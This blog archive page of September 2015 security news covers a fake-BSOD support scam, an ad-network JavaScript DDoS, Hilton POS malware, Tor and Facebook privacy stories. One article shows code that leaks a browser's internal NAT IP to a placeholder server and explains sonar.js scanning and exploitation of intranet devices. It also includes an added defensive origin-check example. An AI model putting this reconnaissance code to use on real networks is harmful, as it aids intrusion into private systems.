Month: September 2015

Novel malware dupes victims with fake blue screen of death


Malware creators are hijacking Microsoft Windows’ infamous BSOD in a fresh malvertising campaign.

A new malvertising campaign uses the Blue Screen of Death to scam users into handing over their money and potentially their identity.

Online search engines are used daily by millions of web users. In order to support the vast amounts of requests these search engines receive and process, search engine providers — such as Google, Yahoo and Microsoft — offer advertising platforms and packages for businesses. Users view sponsored links placed high up on a search results page, businesses gain more exposure and the search engine generates revenue.

However, search engine advertising is also ripe for exploitation and is being used by cyberattackers to generate their own revenue. One of the best-known techniques is setting up malicious domains that deliver malware payloads to victim machines, resulting in enslaved systems, compromised PCs and data theft. Some attackers also set up fraudulent domains that appear legitimate in order to lure victims into entering their account information.

Unfortunately, many online advertisement schemes run through third-party platforms and sometimes threat actors slip through the net — resulting in fraudulent and malicious links being displayed on legitimate, trustworthy domains.

Now, a new and rather novel campaign has attracted cybersecurity firm Malwarebytes’ attention.

In a blog post on Monday, the team at Malwarebytes revealed their findings on a new malvertising campaign which uses the infamous Microsoft Windows’ Blue Screen of Death (BSOD) as its selling point.

The group uses the BSOD to reel in potential victims as a social engineering technique. The security company found attackers bidding on popular phrases through Google’s AdWords advertising space, including the keyword YouTube, to display their adverts at the top of the search results. The advert purports to link to the YouTube URL, but clicking on it instead leads to a convincing web page complete with the BSOD image.

While some users will not be fooled, others without much technical knowledge are likely to be.


On the page, users are instructed to call a toll-free “helpline” to resolve the BSOD issue. The scammers are waiting at the other end for these calls, where they pretend to be Windows support and offer their victims expensive and non-existent “support packages” — defrauding users of anything from $199 to $599.

However, this isn’t necessarily the end of a painful story. Malwarebytes says innocent PC users may also end up having their identity stolen and their bank accounts drained of funds.

In this particular campaign, at least two domains have been registered to redirect users to the fraudulent pages through IP addresses in Arizona.

The campaign was reported to Google and the adverts were immediately pulled, but this is only one such campaign out of thousands of scams appearing online every day.

Source:http://www.zdnet.com/

How can the internal network and private IPs be hacked and exploited?


According to a survey by an IT security firm, most people believe that while they browse the Web they are protected by firewalls and by networks isolated behind private NAT IP addresses. With this understanding, we take the security of intranet websites and of the web interfaces of routers, firewalls, printers, IP phones, payroll systems and so on for granted, even though we leave them unpatched. We assume they remain safe inside the protected zone and that nothing can connect to them directly from the outside world, right?

Well, not entirely. Web browsers can be fully controlled by any web page, which allows them to be used to attack internal network resources, according to ethical hacking training instructors. The web browser of every user on a corporate network can be turned into a springboard for intruders if no advanced perimeter security solutions are in place.

How someone can exploit the internal network

An expert from an IT security firm explains the steps used to exploit the internal network:

  • A victim visits a malicious web page, which takes control of their web browser. The malicious page could be any web page carrying a persistent XSS attack, which hackers are already abusing for mass malware delivery.
  • When the malware runs, it does so from the perspective of the victim’s intranet, which nobody can reach directly from outside. This means the victim’s web browser can be instructed to reveal its NAT IP address and to make connections on the internal network on behalf of the attacker.
  • The malware uses the victim’s web browser as a launch platform, from which it performs port scans, fingerprints the web servers on the internal network and checks which perimeter security solutions are deployed.
  • The malware launches attacks against the internal targets, and the compromised information is sent out of the network for collection.

Obtaining a web browser’s public IP address from the web server is easy, but the internal IP address is somewhat harder, ethical hacking training instructors note. This is the piece of information needed to begin exploring and exploiting the intranet. To obtain the internal IP, Java is invoked in the browser through an applet. That is a simple way to do it. The following code loads MyAddress.class, which then opens the URL given in its URL parameter with the NAT address appended:

http://webserver/ip_address.html?nat=XXXX

<APPLET CODE="MyAddress.class">
  <PARAM NAME="URL" VALUE="http://webserver/ip_address.html?nat=">
</APPLET>

If the victim’s web browser is Mozilla/Firefox, the applet requirement can be skipped and a Java socket invoked directly from JavaScript.

function natIP() {
  var w = window.location;
  var host = w.host;
  var port = w.port || 80;
  // Open a Java socket back to the page's own host via LiveConnect and read the
  // local (NAT) address the socket was bound to.
  var Socket = (new java.net.Socket(host, port)).getLocalAddress().getHostAddress();
  return Socket;
}

Framework for exploiting the internal network

Sonar

Sonar.js is a framework that uses JavaScript, WebRTC and some onload functions to detect internal devices on a network. sonar.js works by using WebRTC to enumerate live hosts on the internal network. Mike Stevans, an ethical hacking training instructor, explains that after enumerating the internal addresses, sonar.js tries to link to static resources such as CSS, images and JavaScript while hooking the onload event handler. If a resource loads successfully and fires the onload event, then we know the host has that resource.

Why is this useful to know? By obtaining a list of the resources hosted on a device, we can attempt to fingerprint the devices and the perimeter security solutions.


How does Sonar work?

Loading the sonar.js payload in a modern web browser causes the following to happen:

  • sonar.js uses WebRTC to enumerate the user’s internal IPs.
  • sonar.js then tries to find other live hosts on the internal network via WebSockets.
  • If a live host is found, sonar.js begins trying to fingerprint it by linking to it through <img src="x"> and <link rel="stylesheet" type="text/css" href="x"> and hooking the onload event. If the resource loads successfully, an event fires to launch the exploit matching the fingerprinting result.

Sonar.js works from a database of fingerprints. A fingerprint is simply a list of known resources on a networked device that can be linked to and detected via onload. Examples include images, CSS stylesheets and even external JavaScript.


According to experts from an IT security firm, by creating your own fingerprints you can build custom exploits that will be launched against internal devices once sonar.js detects them. Common exploits include things like Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea is that these vulnerabilities can be used to do things such as modify a router’s DNS settings, pull files from an internal file server, and more.

Using sonar.js, pentesters can build exploits against internal logging servers, routers, printers, VoIP phones and more, perimeter security experts note. Because internal networks are often less closely monitored, attacks such as CSRF and XSS can be far-reaching as a way of taking over the configurations of a network’s internal devices.
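The CSRF step above only works because an internal device’s admin interface accepts state-changing requests (for example, a router DNS change) from whatever page the victim’s browser happens to be on. The following is an added example, not code from the article or from sonar.js, of the request check such a device could apply: it assumes a Node-style request object with lower-cased headers and a constructed allowlist of the device’s own origins.

```javascript
// Added example (not from the original article): an origin check for the admin
// interface of an internal device (router, printer, NAS), so that a page loaded
// from a public site cannot drive state-changing requests through the victim's
// browser. Requests are plain objects {method, headers}; headers are assumed to
// be lower-cased, as Node's http module delivers them.

// Constructed allowlist: origins from which the device's own UI is served.
const DEVICE_ORIGINS = new Set([
  "http://192.168.1.1",
  "https://192.168.1.1",
  "http://router.lan",
]);

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Reduce a URL-ish header value to scheme://host[:port], or null if unparsable
// (an opaque "null" Origin also ends up as null here).
function originOf(value) {
  if (!value) return null;
  try {
    return new URL(value).origin;
  } catch (e) {
    return null;
  }
}

// Returns {allowed: boolean, reason: string} for one request.
function checkRequest(req, allowedOrigins = DEVICE_ORIGINS) {
  const h = req.headers || {};
  const method = (req.method || "GET").toUpperCase();

  // Fetch Metadata: browsers that send Sec-Fetch-Site label cross-site loads
  // themselves, which also covers the <img>/<link> probes used for
  // onload-based fingerprinting, since those are cross-site GETs.
  if (h["sec-fetch-site"] === "cross-site") {
    return { allowed: false, reason: "cross-site fetch" };
  }

  // Reads that are not flagged cross-site go through unchanged.
  if (SAFE_METHODS.has(method)) {
    return { allowed: true, reason: "safe method" };
  }

  // State-changing request: require a verifiable same-origin source. Browsers
  // always attach Origin to POST (Referer may be stripped), and a malicious
  // page cannot forge either header from script.
  const origin = originOf(h["origin"]) || originOf(h["referer"]);
  if (!origin) {
    return { allowed: false, reason: "no Origin/Referer on unsafe method" };
  }
  if (!allowedOrigins.has(origin)) {
    return { allowed: false, reason: "origin " + origin + " not allowed" };
  }
  return { allowed: true, reason: "same-origin" };
}
```

A per-session CSRF token on the form itself is still the stronger control; the origin check is the cheap layer that stops the cross-site case outright.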

Source:http://noticiasseguridad.com/tecnologia/como-hackear-y-explotar-la-red-interna-y-ips-privadas/

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second


Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.

Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.

“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”

Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.


Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second, close to 1.2 billion requests per hour, during a four-hour span. Most of the requests came from mobile browsers based in China.

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

Majkowski said this was not a packet-injection type of attack. Instead, it is likely that users’ mobile browsers were served iframes with ads requested from a mobile ad network. The network forwarded the requests to the malicious third parties that won the real-time bidding for the slot. The user was then served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

Source:https://threatpost.com

iPhone can be Hacked if within Bluetooth Range


It has been reported that a vulnerability in iPhones means that a hacker can wirelessly hijack your iPhone if they are within Bluetooth range. Australian security researcher and consultant Mark Dowd revealed that iOS 9 includes a patch for this security vulnerability, which he warned Apple about just over a month ago. Tim Erlin, director of security and product management at Tripwire, commented on hacking an iPhone within Bluetooth range.

Tim Erlin, Director of Security and Product Management at Tripwire:


“Vulnerabilities like this one should remind users of the importance of keeping your systems current with security updates. Unfortunately, those who would most benefit from hearing this advice are also the hardest to reach. There’s no doubt that this vulnerability will persist and be exploited on devices that aren’t updated.”

Tripwire is a leading provider of advanced threat, security and compliance solutions that enable enterprises, service providers and government agencies to confidently detect, prevent and respond to cybersecurity threats. Tripwire solutions are based on high-fidelity asset visibility and deep endpoint intelligence combined with business context, and enable security automation through enterprise integration. Tripwire’s portfolio of enterprise-class security solutions includes configuration and policy management, file integrity monitoring, vulnerability management and log intelligence.

Source:http://www.informationsecuritybuzz.com/

Hilton hotels in credit-card-stealing malware infection scare


Someone has hacked the Hilton’s sales registers, and made off with guests’ credit-card details, it’s claimed. The hotel chain confirmed today it is investigating the alleged breach of its computer security.

Investigative journo Brian Krebs says malware in point-of-sale (POS) terminals is believed to have nicked the card information, some of which is already being used to make fraudulent transactions, we’re told.

Multiple sources have told Krebs that bank staff have traced the misused cards to a common source: the tills at restaurants and gift shops in various Hilton hotels around the US.

It is not clear how many accounts may have been compromised, but the malware was active from April 21 to July 27 of this year, apparently. Visa reportedly issued a security alert on the security breach back in August.


Sales terminals in Doubletree, Embassy Suites, Hampton, and Waldorf Astoria hotels were also compromised, it is claimed.

A Hilton spokesperson told The Register late on Friday afternoon:

Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace. We take any potential issue very seriously, and we are looking into this matter.

If Krebs’ sources are on the money, Hilton will be the latest major American chain to suffer a massive credit card security breach as the result of a malware incursion. Criminals typically plant malware on PC-like tills to collect credit card information when a purchase is made, and then siphon off the numbers.

Source:http://www.theregister.co.uk/

Russian firm tasked with cracking Tor throws in towel


The company hired by the Kremlin to gather information on and crack the anonymous browser Tor is now looking to pay more than the contract’s value in legal fees to back out of the agreement, according to Bloomberg.

Last year, Russia’s Interior Ministry offered a contract, then worth approximately $110,000, “to study the possibility of obtaining technical information on users and users’ equipment of Tor anonymous network,” in an attempt to crack the anonymity offered by the network.

A Russian firm tasked with gathering information on Tor users is paying more than the value of the contract to back out of the agreement.

The Central Research Institute of Economics, Informatics, and Control Systems, a state-run maker of helicopters, weapons, and other military and industrial equipment, accepted the contract.

The firm was not able to hack into the browser, according to online Russian news site Meduza.

Documents obtained from a database of state-purchased disclosures revealed the company agreed to pay $150,000 in legal fees to abandon the Tor project and several other classified government contracts, according to the Bloomberg report.

Lawyers from Pleshakov, Ushkalov and Partners are negotiating with Russian officials to help the firm reach a settlement.

Source:http://www.scmagazine.com/

Facebook Following NSA Footsteps to Spy on Users: Belgium’s Privacy Advocate


In June this year, we reported how Facebook was sued by Belgium’s Privacy Commission (BPC) for tracking users, even those who had never made a profile on the social media site.

Now, Frederic Debussere (representative of the Belgian Privacy Commission/BPC), in his opening arguments on Monday, referred to Edward Snowden, the famous NSA whistleblower, when describing the mass surveillance program of the NSA.

He said:

“When it became known that the NSA was spying on people all around the world, everybody was upset. This actor [Facebook] is doing the very same thing, albeit in a different way.”

Detailed Analysis:

The BPC accused Facebook of “trampling” over European and Belgian privacy law and brought a lawsuit against the social network.


The details of the alleged breaches from Facebook can be found in a report from the BPC, in which the commission mentioned that Facebook tracked non-users and those who already had logged out from the site for advertising purposes.

Reportedly, the BPC is threatening Facebook with a fine of $250,000 per day for not responding to its demands.

The Cookie Aspect:

Facebook has categorically denied the claims and states that the data and information presented by the BPC in its privacy report are false.

According to an official Facebook spokesperson, the social network intends to “show the court how this technology protects people from spam, malware, and other attacks, that our practices are consistent with EU law and with those of the most popular Belgian websites,” the Guardian reports.

Moreover, Facebook repeatedly has mentioned that all of its operations and practices in European regions are audited and controlled under the Irish data protection agency. The headquarters of Facebook’s European branch is also situated in Dublin, Ireland.

A representative of Facebook, Paul Lefebvre said:

“How could Facebook be subject to Belgian law if the management of data gathering is being done by Facebook Ireland and its 900 employees in that country?”

Belgians need not ‘be intimidated’ by Facebook:

The whole of Europe is watching the case intently since data privacy regulators throughout the region, even in the Netherlands, have started to point fingers at the privacy practices of Facebook.

Source:https://www.hackread.com